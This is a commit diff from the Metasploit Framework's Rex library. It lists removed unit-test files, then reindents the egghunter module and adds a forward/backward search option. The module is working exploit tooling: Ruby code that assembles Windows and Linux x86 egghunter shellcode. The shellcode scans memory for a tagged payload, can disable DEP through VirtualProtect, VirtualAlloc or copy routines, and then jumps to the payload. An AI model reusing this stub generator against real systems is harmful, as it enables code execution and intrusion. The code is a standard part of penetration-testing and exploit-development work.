data/lib/rex/proto/http/packet.rb.ut.rb +0 -166
data/lib/rex/proto/http/request.rb.ut.rb +0 -215
data/lib/rex/proto/http/response.rb.ut.rb +0 -150
data/lib/rex/proto/http/server.rb.ut.rb +0 -80
data/lib/rex/proto/ntlm.rb.ut.rb +0 -181
data/lib/rex/proto/rfb.rb.ut.rb +0 -40
data/lib/rex/proto/smb.rb.ts.rb +0 -9
data/lib/rex/proto/smb/client.rb.ut.rb +0 -224
data/lib/rex/proto/smb/constants.rb.ut.rb +0 -19
data/lib/rex/proto/smb/simpleclient.rb.ut.rb +0 -129
data/lib/rex/proto/smb/utils.rb.ut.rb +0 -21
data/lib/rex/proto/tftp/server.rb.ut.rb +0 -29
data/lib/rex/service_manager.rb.ut.rb +0 -33
data/lib/rex/socket.rb.ut.rb +0 -108
data/lib/rex/socket/comm/local.rb.ut.rb +0 -76
data/lib/rex/socket/parameters.rb.ut.rb +0 -52
data/lib/rex/socket/range_walker.rb.ut.rb +0 -56
data/lib/rex/socket/ssl_tcp.rb.ut.rb +0 -40
data/lib/rex/socket/ssl_tcp_server.rb.ut.rb +0 -62
data/lib/rex/socket/subnet_walker.rb.ut.rb +0 -29
data/lib/rex/socket/switch_board.rb.ut.rb +0 -53
data/lib/rex/socket/tcp.rb.ut.rb +0 -65
data/lib/rex/socket/tcp_server.rb.ut.rb +0 -45
data/lib/rex/socket/udp.rb.ut.rb +0 -45
data/lib/rex/test.rb +0 -36
data/lib/rex/text.rb.ut.rb +0 -193
data/lib/rex/transformer.rb.ut.rb +0 -39
data/lib/rex/ui/text/color.rb.ut.rb +0 -19
data/lib/rex/ui/text/progress_tracker.rb.ut.rb +0 -35
data/lib/rex/ui/text/table.rb.ut.rb +0 -56

data/lib/rex/exploitation/egghunter.rb CHANGED

@@ -22,389 +22,402 @@ module Exploitation
 # Conversion to use Metasm by jduck
 # Startreg code added by corelanc0d3r
 # Added routine to disable DEP for discovered egg (for win, added by corelanc0d3r)
+# Added support for searchforward option (true or false)
 #
 ###
 class Egghunter
-	###
-	#
-	# Windows-based egghunters
-	#
-	###
-	module Windows
-		Alias = "win"
-		module X86
-			Alias = ARCH_X86
-			#
-			# The egg hunter stub for win/x86.
-			#
-			def hunter_stub(payload, badchars = '', opts = {})
-				startreg = opts[:startreg]
-				raise RuntimeError, "Invalid egg string! Need #{esize} bytes." if opts[:eggtag].length != 4
-				marker = "0x%x" % opts[:eggtag].unpack('V').first
-				checksum = checksum_stub(payload, badchars, opts)
-				startstub = ''
-				if startreg
-					if startreg.downcase != 'edx'
-						startstub = "\n\tmov edx,#{startreg}\n\tjmp next_addr"
-					else
-						startstub = "\n\tjmp next_addr"
-					end
-				end
-				startstub << "\n\t" if startstub.length > 0
-				getpointer   = ''
-				getsize      = ''
-				getalloctype = ''
-				getpc        = ''
-				jmppayload   = "jmp edi"
-				apireg = opts[:depreg] || 'esi'
-				apidest = opts[:depdest]
-				depsize = opts[:depsize]
-				freeregs = [ "esi", "ebp", "ecx", "ebx" ]
-				reginfo = {
-					"ebx"=>["bx","bl","bh"],
-					"ecx"=>["cx","cl","ch"]
-				}
-				if opts[:depmethod]
-					if freeregs.index(apireg) == nil
-						getpointer << "mov #{freeregs[0]},#{apireg}\n\t"
-						apireg = freeregs[0]
-					end
-					freeregs.delete(apireg)
-					if opts[:depmethod].downcase == "virtualalloc"
-						depsize = 0xfff
-					end
-					if opts[:depmethod].downcase == "copy" || opts[:depmethod].downcase == "copy_size"
-						if apidest
-							if freeregs.index(apidest) == nil
-								getpointer << "mov #{freeregs[0]},#{apidest}\n\t"
-								apidest = freeregs[0]
-							end
-						else
-							getpc = "fldpi\n\tfstenv [esp-0xc]\n\tpop #{freeregs[0]}\n\t"
-							apidest = freeregs[0]
-						end
-						freeregs.delete(apidest)
-					end
-					sizereg = freeregs[0]
-					if not depsize
-						depsize = payload.length * 2
-						if opts[:depmethod]
-							if opts[:depmethod].downcase == "copy_size"
-								depsize = payload.length
-							end
-						end
-					end
-					if depsize <= 127
-						getsize << "push 0x%02x\n\t" % depsize
-					else
-						sizebytes = "%04x" % depsize
-						low = sizebytes[2,4]
-						high = sizebytes[0,2]
-						if sizereg == "ecx" || sizereg == "ebx"
-							regvars = reginfo[sizereg]
-							getsize << "xor #{sizereg},#{sizereg}\n\t"
-							if low != "00" and high != "00"
-								getsize << "mov #{regvars[0]},0x%s\n\t" % sizebytes
-							elsif low != "00"
-								getsize << "mov #{regvars[1]},0x%s\n\t" % low
-							elsif high != "00"
-								getsize << "mov #{regvars[2]},0x%s\n\t" % high
-							end
-						end
-						if sizereg == "ebp"
-							if low != "00" and high != "00"
-								getsize << "xor #{sizereg},#{sizereg}\n\t"
-								getsize << "mov bp,0x%s\n\t" % sizebytes
-							end
-						end
-						# last resort
-						if getsize == ''
-							blockcnt = 0
-							vpsize = 0
-							blocksize = depsize
-							while blocksize > 127
-								blocksize = blocksize / 2
-								blockcnt += 1
-							end
-							getsize << "xor #{sizereg},#{sizereg}\n\tadd #{sizereg},0x%02x\n\t" % blocksize
-							vpsize = blocksize
-							depblockcnt = 0
-							while depblockcnt < blockcnt
-								getsize << "add #{sizereg},#{sizereg}\n\t"
-								vpsize += vpsize
-								depblockcnt += 1
-							end
-							delta = depsize - vpsize
-							if delta > 0
-								getsize << "add #{sizereg},0x%02x\n\t" % delta
-							end
-						end
-						if opts[:depmethod].downcase == "virtualalloc"
-							getsize << "inc #{sizereg}\n\t"
-						end
-						getsize << "push #{sizereg}\n\t"
-					end
-					getalloctype = getsize
-					case opts[:depmethod].downcase
-						when "virtualprotect"
-							jmppayload = "push esp\n\tpush 0x40\n\t"
-							jmppayload << getsize
-							jmppayload << "push edi\n\tpush edi\n\tpush #{apireg}\n\tret"
-						when "virtualalloc"
-							jmppayload = "push 0x40\n\t"
-							jmppayload << getalloctype
-							jmppayload << "push 0x01\n\t"
-							jmppayload << "push edi\n\tpush edi\n\tpush #{apireg}\n\tret"
-						when "copy"
-							jmppayload = getpc
-							jmppayload << "push edi\n\tpush #{apidest}\n\tpush #{apidest}\n\tpush #{apireg}\n\tmov edi,#{apidest}\n\tret"
-						when "copy_size"
-							jmppayload = getpc
-							jmppayload << getsize
-							jmppayload << "push edi\n\tpush #{apidest}\n\tpush #{apidest}\n\tpush #{apireg}\n\tmov edi,#{apidest}\n\tret"
-					end
-				end
-				jmppayload << "\n" if jmppayload.length > 0
-				assembly = <<EOS
+  ###
+  #
+  # Windows-based egghunters
+  #
+  ###
+  module Windows
+    Alias = "win"
+    module X86
+      Alias = ARCH_X86
+      #
+      # The egg hunter stub for win/x86.
+      #
+      def hunter_stub(payload, badchars = '', opts = {})
+        startreg      = opts[:startreg]
+        searchforward = opts[:searchforward]
+        raise RuntimeError, "Invalid egg string! Need #{esize} bytes." if opts[:eggtag].length != 4
+        marker = "0x%x" % opts[:eggtag].unpack('V').first
+        checksum = checksum_stub(payload, badchars, opts)
+        startstub = ''
+        if startreg
+          if startreg.downcase != 'edx'
+            startstub = "\n\tmov edx,#{startreg}\n\tjmp next_addr"
+          else
+            startstub = "\n\tjmp next_addr"
+          end
+        end
+        startstub << "\n\t" if startstub.length > 0
+        # search forward or backward ?
+        flippage = "\n\tor dx,0xfff"
+        edxdirection = "\n\tinc edx"
+        if searchforward
+          if searchforward.to_s.downcase == 'false'
+            # go backwards
+            flippage = "\n\txor dl,dl"
+            edxdirection = "\n\tdec edx"
+          end
+        end
+        # other vars
+        getpointer   = ''
+        getsize      = ''
+        getalloctype = ''
+        getpc        = ''
+        jmppayload   = "jmp edi"
+        apireg = opts[:depreg] || 'esi'
+        apidest = opts[:depdest]
+        depsize = opts[:depsize]
+        freeregs = [ "esi", "ebp", "ecx", "ebx" ]
+        reginfo = {
+          "ebx"=>["bx","bl","bh"],
+          "ecx"=>["cx","cl","ch"]
+        }
+        if opts[:depmethod]
+          if freeregs.index(apireg) == nil
+            getpointer << "mov #{freeregs[0]},#{apireg}\n\t"
+            apireg = freeregs[0]
+          end
+          freeregs.delete(apireg)
+          if opts[:depmethod].downcase == "virtualalloc"
+            depsize = 0xfff
+          end
+          if opts[:depmethod].downcase == "copy" || opts[:depmethod].downcase == "copy_size"
+            if apidest
+              if freeregs.index(apidest) == nil
+                getpointer << "mov #{freeregs[0]},#{apidest}\n\t"
+                apidest = freeregs[0]
+              end
+            else
+              getpc = "fldpi\n\tfstenv [esp-0xc]\n\tpop #{freeregs[0]}\n\t"
+              apidest = freeregs[0]
+            end
+            freeregs.delete(apidest)
+          end
+          sizereg = freeregs[0]
+          if not depsize
+            depsize = payload.length * 2
+            if opts[:depmethod]
+              if opts[:depmethod].downcase == "copy_size"
+                depsize = payload.length
+              end
+            end
+          end
+          if depsize <= 127
+            getsize << "push 0x%02x\n\t" % depsize
+          else
+            sizebytes = "%04x" % depsize
+            low = sizebytes[2,4]
+            high = sizebytes[0,2]
+            if sizereg == "ecx" || sizereg == "ebx"
+              regvars = reginfo[sizereg]
+              getsize << "xor #{sizereg},#{sizereg}\n\t"
+              if low != "00" and high != "00"
+                getsize << "mov #{regvars[0]},0x%s\n\t" % sizebytes
+              elsif low != "00"
+                getsize << "mov #{regvars[1]},0x%s\n\t" % low
+              elsif high != "00"
+                getsize << "mov #{regvars[2]},0x%s\n\t" % high
+              end
+            end
+            if sizereg == "ebp"
+              if low != "00" and high != "00"
+                getsize << "xor #{sizereg},#{sizereg}\n\t"
+                getsize << "mov bp,0x%s\n\t" % sizebytes
+              end
+            end
+            # last resort
+            if getsize == ''
+              blockcnt = 0
+              vpsize = 0
+              blocksize = depsize
+              while blocksize > 127
+                blocksize = blocksize / 2
+                blockcnt += 1
+              end
+              getsize << "xor #{sizereg},#{sizereg}\n\tadd #{sizereg},0x%02x\n\t" % blocksize
+              vpsize = blocksize
+              depblockcnt = 0
+              while depblockcnt < blockcnt
+                getsize << "add #{sizereg},#{sizereg}\n\t"
+                vpsize += vpsize
+                depblockcnt += 1
+              end
+              delta = depsize - vpsize
+              if delta > 0
+                getsize << "add #{sizereg},0x%02x\n\t" % delta
+              end
+            end
+            if opts[:depmethod].downcase == "virtualalloc"
+              getsize << "inc #{sizereg}\n\t"
+            end
+            getsize << "push #{sizereg}\n\t"
+          end
+          getalloctype = getsize
+          case opts[:depmethod].downcase
+            when "virtualprotect"
+              jmppayload = "push esp\n\tpush 0x40\n\t"
+              jmppayload << getsize
+              jmppayload << "push edi\n\tpush edi\n\tpush #{apireg}\n\tret"
+            when "virtualalloc"
+              jmppayload = "push 0x40\n\t"
+              jmppayload << getalloctype
+              jmppayload << "push 0x01\n\t"
+              jmppayload << "push edi\n\tpush edi\n\tpush #{apireg}\n\tret"
+            when "copy"
+              jmppayload = getpc
+              jmppayload << "push edi\n\tpush #{apidest}\n\tpush #{apidest}\n\tpush #{apireg}\n\tmov edi,#{apidest}\n\tret"
+            when "copy_size"
+              jmppayload = getpc
+              jmppayload << getsize
+              jmppayload << "push edi\n\tpush #{apidest}\n\tpush #{apidest}\n\tpush #{apireg}\n\tmov edi,#{apidest}\n\tret"
+          end
+        end
+        jmppayload << "\n" if jmppayload.length > 0
+        assembly = <<EOS
 #{getpointer}
 #{startstub}
 check_readable:
-	or dx,0xfff
+  #{flippage}
 next_addr:
-	inc edx
-	push edx
-	push 0x02   ; use NtAccessCheckAndAuditAlarm syscall
-	pop eax
-	int 0x2e
-	cmp al,5
-	pop edx
-	je check_readable
+  #{edxdirection}
+  push edx
+  push 0x02   ; use NtAccessCheckAndAuditAlarm syscall
+  pop eax
+  int 0x2e
+  cmp al,5
+  pop edx
+  je check_readable
 check_for_tag:
-	; check that the tag matches once
-	mov eax,#{marker}
-	mov edi,edx
-	scasd
-	jne next_addr
-	; it must match a second time too
-	scasd
-	jne next_addr
-	; check the checksum if the feature is enabled
+  ; check that the tag matches once
+  mov eax,#{marker}
+  mov edi,edx
+  scasd
+  jne next_addr
+  ; it must match a second time too
+  scasd
+  jne next_addr
+  ; check the checksum if the feature is enabled
 #{checksum}
-	; jump to the payload
-	#{jmppayload}
+  ; jump to the payload
+  #{jmppayload}
 EOS
-				assembled_code = Metasm::Shellcode.assemble(Metasm::Ia32.new, assembly).encode_string
+        assembled_code = Metasm::Shellcode.assemble(Metasm::Ia32.new, assembly).encode_string
-				# return the stub
-				assembled_code
-			end
+        # return the stub
+        assembled_code
+      end
-		end
-	end
+    end
+  end
-	###
-	#
-	# Linux-based egghunters
-	#
-	###
-	module Linux
-		Alias = "linux"
+  ###
+  #
+  # Linux-based egghunters
+  #
+  ###
+  module Linux
+    Alias = "linux"
-		module X86
-			Alias = ARCH_X86
+    module X86
+      Alias = ARCH_X86
-			#
-			# The egg hunter stub for linux/x86.
-			#
-			def hunter_stub(payload, badchars = '', opts = {})
+      #
+      # The egg hunter stub for linux/x86.
+      #
+      def hunter_stub(payload, badchars = '', opts = {})
-				startreg = opts[:startreg]
+        startreg = opts[:startreg]
-				raise RuntimeError, "Invalid egg string! Need #{esize} bytes." if opts[:eggtag].length != 4
-				marker = "0x%x" % opts[:eggtag].unpack('V').first
+        raise RuntimeError, "Invalid egg string! Need #{esize} bytes." if opts[:eggtag].length != 4
+        marker = "0x%x" % opts[:eggtag].unpack('V').first
-				checksum = checksum_stub(payload, badchars, opts)
+        checksum = checksum_stub(payload, badchars, opts)
-				startstub = ''
-				if startreg
-					if startreg.downcase != 'ecx'
-						startstub = "\n\tmov ecx,#{startreg}\n\tjmp next_addr"
-					else
-						startstub = "\n\tjmp next_addr"
-					end
-				end
-				startstub << "\n\t" if startstub.length > 0
+        startstub = ''
+        if startreg
+          if startreg.downcase != 'ecx'
+            startstub = "\n\tmov ecx,#{startreg}\n\tjmp next_addr"
+          else
+            startstub = "\n\tjmp next_addr"
+          end
+        end
+        startstub << "\n\t" if startstub.length > 0
-				assembly = <<EOS
-	cld
+        assembly = <<EOS
+  cld
 #{startstub}
 check_readable:
-	or cx,0xfff
+  or cx,0xfff
 next_addr:
-	inc ecx
-	push 0x43   ; use 'sigaction' syscall
-	pop eax
-	int 0x80
-	cmp al,0xf2
-	je check_readable
+  inc ecx
+  push 0x43   ; use 'sigaction' syscall
+  pop eax
+  int 0x80
+  cmp al,0xf2
+  je check_readable
 check_for_tag:
-	; check that the tag matches once
-	mov eax,#{marker}
-	mov edi,ecx
-	scasd
-	jne next_addr
-	; it must match a second time too
-	scasd
-	jne next_addr
-	; check the checksum if the feature is enabled
+  ; check that the tag matches once
+  mov eax,#{marker}
+  mov edi,ecx
+  scasd
+  jne next_addr
+  ; it must match a second time too
+  scasd
+  jne next_addr
+  ; check the checksum if the feature is enabled
 #{checksum}
-	; jump to the payload
-	jmp edi
+  ; jump to the payload
+  jmp edi
 EOS
-				assembled_code = Metasm::Shellcode.assemble(Metasm::Ia32.new, assembly).encode_string
-				# return the stub
-				assembled_code
-			end
-		end
-	end
-	###
-	#
-	# Generic interface
-	#
-	###
-	#
-	# Creates a new egghunter instance and acquires the sub-class that should
-	# be used for generating the stub based on the supplied platform and
-	# architecture.
-	#
-	def initialize(platform, arch = nil)
-		Egghunter.constants.each { |c|
-			mod = self.class.const_get(c)
-			next if ((!mod.kind_of?(::Module)) or
-			         (!mod.const_defined?('Alias')))
-			if (platform =~ /#{mod.const_get('Alias')}/i)
-				self.extend(mod)
-				if (arch and mod)
-					mod.constants.each { |a|
-						amod = mod.const_get(a)
-						next if ((!amod.kind_of?(::Module)) or
-						         (!amod.const_defined?('Alias')))
-						if (arch =~ /#{mod.const_get(a).const_get('Alias')}/i)
-							amod = mod.const_get(a)
-							self.extend(amod)
-						end
-					}
-				end
-			end
-		}
-	end
-	#
-	# This method generates an egghunter using the derived hunter stub.
-	#
-	def generate(payload, badchars = '', opts = {})
-		# set defaults if options are missing
-		# NOTE: there is no guarantee this won't exist in memory, even when doubled.
-		# To address this, use the checksum feature :)
-		opts[:eggtag] ||= Rex::Text.rand_text(4, badchars)
-		# Generate the hunter_stub portion
-		return nil if ((hunter = hunter_stub(payload, badchars, opts)) == nil)
-		# Generate the marker bits to be prefixed to the real payload
-		egg = ''
-		egg << opts[:eggtag] * 2
-		egg << payload
-		if opts[:checksum]
-			cksum = 0
-			payload.each_byte { |b|
-				cksum += b
-			}
-			egg << [cksum & 0xff].pack('C')
-		end
-		return [ hunter, egg ]
-	end
+        assembled_code = Metasm::Shellcode.assemble(Metasm::Ia32.new, assembly).encode_string
+        # return the stub
+        assembled_code
+      end
+    end
+  end
+  ###
+  #
+  # Generic interface
+  #
+  ###
+  #
+  # Creates a new egghunter instance and acquires the sub-class that should
+  # be used for generating the stub based on the supplied platform and
+  # architecture.
+  #
+  def initialize(platform, arch = nil)
+    Egghunter.constants.each { |c|
+      mod = self.class.const_get(c)
+      next if ((!mod.kind_of?(::Module)) or
+               (!mod.const_defined?('Alias')))
+      if (platform =~ /#{mod.const_get('Alias')}/i)
+        self.extend(mod)
+        if (arch and mod)
+          mod.constants.each { |a|
+            amod = mod.const_get(a)
+            next if ((!amod.kind_of?(::Module)) or
+                     (!amod.const_defined?('Alias')))
+            if (arch =~ /#{mod.const_get(a).const_get('Alias')}/i)
+              amod = mod.const_get(a)
+              self.extend(amod)
+            end
+          }
+        end
+      end
+    }
+  end
+  #
+  # This method generates an egghunter using the derived hunter stub.
+  #
+  def generate(payload, badchars = '', opts = {})
+    # set defaults if options are missing
+    # NOTE: there is no guarantee this won't exist in memory, even when doubled.
+    # To address this, use the checksum feature :)
+    opts[:eggtag] ||= Rex::Text.rand_text(4, badchars)
+    # Generate the hunter_stub portion
+    return nil if ((hunter = hunter_stub(payload, badchars, opts)) == nil)
+    # Generate the marker bits to be prefixed to the real payload
+    egg = ''
+    egg << opts[:eggtag] * 2
+    egg << payload
+    if opts[:checksum]
+      cksum = 0
+      payload.each_byte { |b|
+        cksum += b
+      }
+      egg << [cksum & 0xff].pack('C')
+    end
+    return [ hunter, egg ]
+  end
 protected
-	#
-	# Stub method that is meant to be overridden.  It returns the raw stub that
-	# should be used as the egghunter.
-	#
-	def hunter_stub(payload, badchars = '', opts = {})
-	end
-	def checksum_stub(payload, badchars = '', opts = {})
-		return '' if not opts[:checksum]
-		if payload.length < 0x100
-			cmp_reg = "cl"
-		elsif payload.length < 0x10000
-			cmp_reg = "cx"
-		else
-			raise RuntimeError, "Payload too big!"
-		end
-		egg_size = "0x%x" % payload.length
-		checksum = <<EOS
-	push ecx
-	xor ecx,ecx
-	xor eax,eax
+  #
+  # Stub method that is meant to be overridden.  It returns the raw stub that
+  # should be used as the egghunter.
+  #
+  def hunter_stub(payload, badchars = '', opts = {})
+  end
+  def checksum_stub(payload, badchars = '', opts = {})
+    return '' if not opts[:checksum]
+    if payload.length < 0x100
+      cmp_reg = "cl"
+    elsif payload.length < 0x10000
+      cmp_reg = "cx"
+    else
+      raise RuntimeError, "Payload too big!"
+    end
+    egg_size = "0x%x" % payload.length
+    checksum = <<EOS
+  push ecx
+  xor ecx,ecx
+  xor eax,eax
 calc_chksum_loop:
-	add al,byte [edi+ecx]
-	inc ecx
-	cmp #{cmp_reg},#{egg_size}
-	jnz calc_chksum_loop
+  add al,byte [edi+ecx]
+  inc ecx
+  cmp #{cmp_reg},#{egg_size}
+  jnz calc_chksum_loop
 test_chksum:
-	cmp al,byte [edi+ecx]
-	pop ecx
-	jnz next_addr
+  cmp al,byte [edi+ecx]
+  pop ecx
+  jnz next_addr
 EOS
-	end
+  end
 end